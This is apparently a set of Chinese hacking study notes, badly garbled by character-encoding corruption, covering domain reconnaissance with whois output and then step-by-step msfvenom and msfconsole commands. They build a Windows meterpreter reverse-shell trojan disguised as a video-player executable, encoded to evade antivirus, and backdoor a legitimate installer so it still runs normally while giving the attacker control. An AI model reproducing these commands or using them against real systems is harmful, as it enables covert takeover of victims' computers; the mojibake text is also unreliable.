> ## æŸ¥è¯¢åŸŸåç›¸å…³ä¿¡æ¯
>
> æŸ¥è¯¢ipä¸ŽåŸŸåå¯¹åº”ï¼š
>
> ping + åŸŸå
>
> nslookup + åŸŸå
>
> Dig + åŸŸå ã€dig+@114.114.114.114 +åŸŸå
>
> dig+x+ip ->è¿”å›žåŸŸå
>
> ---
>
> 
>
> ```c
> â”€# whois xuegod.cn    æŸ¥è¯¢åŸŸåç›¸å…³ä¿¡æ¯
> Domain Name: xuegod.cn
> ROID: 20140908s10001s72166376-cn
> Domain Status: ok
> Registrant: åŒ—äº¬è·³åŠ¨æœªæ¥ç§‘æŠ€æœ‰é™å…¬å¸
> Registrant Contact Email: jianmingbasic@163.com
> Sponsoring Registrar: é˜¿é‡Œäº‘è®¡ç®—æœ‰é™å…¬å¸ï¼ˆä¸‡ç½‘ï¼‰
> Name Server: dns7.hichina.com
> Name Server: dns8.hichina.com
> Registration Time: 2014-09-08 10:52:31
> Expiration Time: 2022-09-08 10:52:31
> DNSSEC: unsigned
> ```
>
> ## 
>
> ```c
> beianbeian.com  æœä¼ä¸šåŸŸåæœç´¢
> å¤©çœ¼æŸ¥						å¤‡æ¡ˆä¿¡æ¯æŸ¥è¯¢
> ```
>
> ----
>
> #### å­åŸŸå
>
> å¤§åž‹ç½‘ç«™å°±æœ‰å­åŸŸåï¼Œå°åž‹ç½‘ç«™ä¸€èˆ¬å°±ä¸€ä¸ªä¸»åŸŸåã€‚
>
> æœ‰çš„ä¸»åŸŸåæ— æ³•ç›´æŽ¥æ”»ç ´ï¼Œå¯ä»¥å…ˆæ”»ç ´å­åŸŸåã€‚
>
> å­åŸŸåæŒ–æŽ˜æœºï¼šmaltegoå·¥å…·  å¾—ç¿»å¢™æ³¨å†Œï¼Œä¸ç„¶ç”¨ä¸äº†
>
> å­åŸŸåæŸ¥è¯¢ç½‘ç«™--è‡ªå·±ä¸Šç½‘æœ
>
> ---
>
> # ç”Ÿæˆè¥¿ç“œå½±éŸ³çš„åŽé—¨ç¨‹åº
>
> ```c
> â”Œâ”€â”€(rootðŸ’€kali)-[~]
> â””â”€# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.130  LPORT=4444 -b "\0x00" -e x86/shikate_ga_nai -i 10 -f exe -o /var/www/html/è¥¿ç“œå½±éŸ³1.exe
> 
> [-] Skipping invalid encoder x86/shikate_ga_nai
> [!] Couldn't find encoder to use
> No encoder specified, outputting raw payload
> Payload size: 354 bytes
> Final size of exe file: 73802 bytes
> Saved as: /var/www/html/è¥¿ç“œå½±éŸ³1.exe
>   
> msfvenomï¼šå·¥å…·
> -a x86ï¼šæŒ‡å®šæž¶æž„  32ä½
> --platform wondowsï¼šå¹³å°
> -p windows/meterpreter/reverse_tcpï¼šæ¯”shellå¼ºå¤§å¾ˆå¤š
> ç›®æ ‡ä¸»æœºæ‰§è¡Œæœ¨é©¬ç¨‹åºåŽä¼šä¸Žlhostä¸»æœºçš„lportç«¯å£ç›¸è¿žæŽ¥
> -b '\x00':åŽ»æŽ‰16è¿›åˆ¶çš„åå­—ç¬¦
> -e x86/shikate_ga_naiï¼šç¼–ç å™¨ å…æ€ï¼Œé€ƒé¿é˜²æŠ¤è½¯ä»¶
> -i 10ï¼šç¼–ç æ¬¡æ•°
> -f exeï¼šåˆ¶å®šæ–‡ä»¶æ ¼å¼
> -o /var/www/html/è¥¿ç“œå½±éŸ³1.exeï¼šè¾“å‡ºä½ç½®ä¸Žå‘½å
> ```
>
> -----
>
> ç”Ÿæˆçš„exeæœ¨é©¬ç¨‹åºåœ¨ç›®æ ‡æœºè¿è¡ŒåŽ
>
> æˆ‘ä»¬åœ¨kaliä¸»æœºå¯ä»¥ç›‘æŽ§ç›®æ ‡æœºçš„æ‰€æœ‰æ“ä½œï¼Œå¯ä»¥çœ‹åˆ°ç›®æ ‡æœºçš„ç•Œé¢ã€‚
>
> ```c
> è¾“å…¥ msfconsoleï¼šè¿›å…¥msfå‘½ä»¤è¡Œæ¨¡å¼
> msfdb run:è¿è¡Œmfs
> use windows/meterpreter/reverse_tcp//å¥½åƒä¸æ˜¯è¿™å¥
> set payload windows/meterpreter/reverse_tcp  è®¾ç½®payload
> show option:æŸ¥çœ‹ä¸»æœºçš„ip+port
> set LHOST å½“å‰kaliçš„ip
> exploitï¼šè¿›å…¥æ”»å‡»æ¨¡å¼
> run:å¼€å§‹ç›‘å¬---ç›®æ ‡æœºç¨‹åºä¸€æ—¦è¿è¡Œè¿™é‡Œå°±å»ºç«‹é“¾æŽ¥äº†ã€‚
> meterpreter>ï¼šæœ€ç»ˆåˆ°è¾¾è¿™ä¸ªç•Œé¢å°±å¯ä»¥æ“æŽ§ç›®æ ‡æœºå™¨äº†ã€‚
> ```
>
> ----
>
> ## å¦‚ä½•ç»™ä¸€ä¸ªæ­£å¸¸çš„è½¯ä»¶æ¤å…¥åŽé—¨--è¿™æ‰æ˜¯åŽ‰å®³çš„æœ¨é©¬
>
> æ¤å…¥åŽé—¨ï¼šç»™æ­£å¸¸çš„qq.exeæ¤å…¥åŽé—¨åŽè¿˜å«qq.exeå¹¶ä¸”å¯ä»¥æ­£å¸¸å®‰è£…ï¼ŒåŠŸèƒ½ä¹Ÿå¯ä»¥æ­£å¸¸ä½¿ç”¨ã€‚ä½†æ˜¯åŠ å…¥åŽé—¨ä¹‹åŽï¼Œè¿™ä¸ªqqæ‰€åœ¨çš„ç›®æ ‡æœºå°±ä¼šè¢«ä¸»æœºç›‘æŽ§ã€‚
>
> ```c
> â”Œâ”€â”€(rootðŸ’€kali)-[~]
> â””â”€# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.130  LPORT=4444 -b "\0x00" -e x86/shikate_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe
>   
> ç»™å¿«æ’­çš„å­ç¨‹åºæ¤å…¥æœ¨é©¬ã€‚å¤šäº†ä¸ª-x xxx.exeã€‚å½“å‰è·¯å¾„å¿…é¡»æ˜¯xxx.exeæ‰€åœ¨çš„è·¯å¾„ï¼Œè¿™æ ·å°±å¯ä»¥ç›´æŽ¥ç”Ÿæˆæ–°çš„å¸¦æœ¨é©¬çš„exeã€‚
> 
> 
> 
> ```
>
> 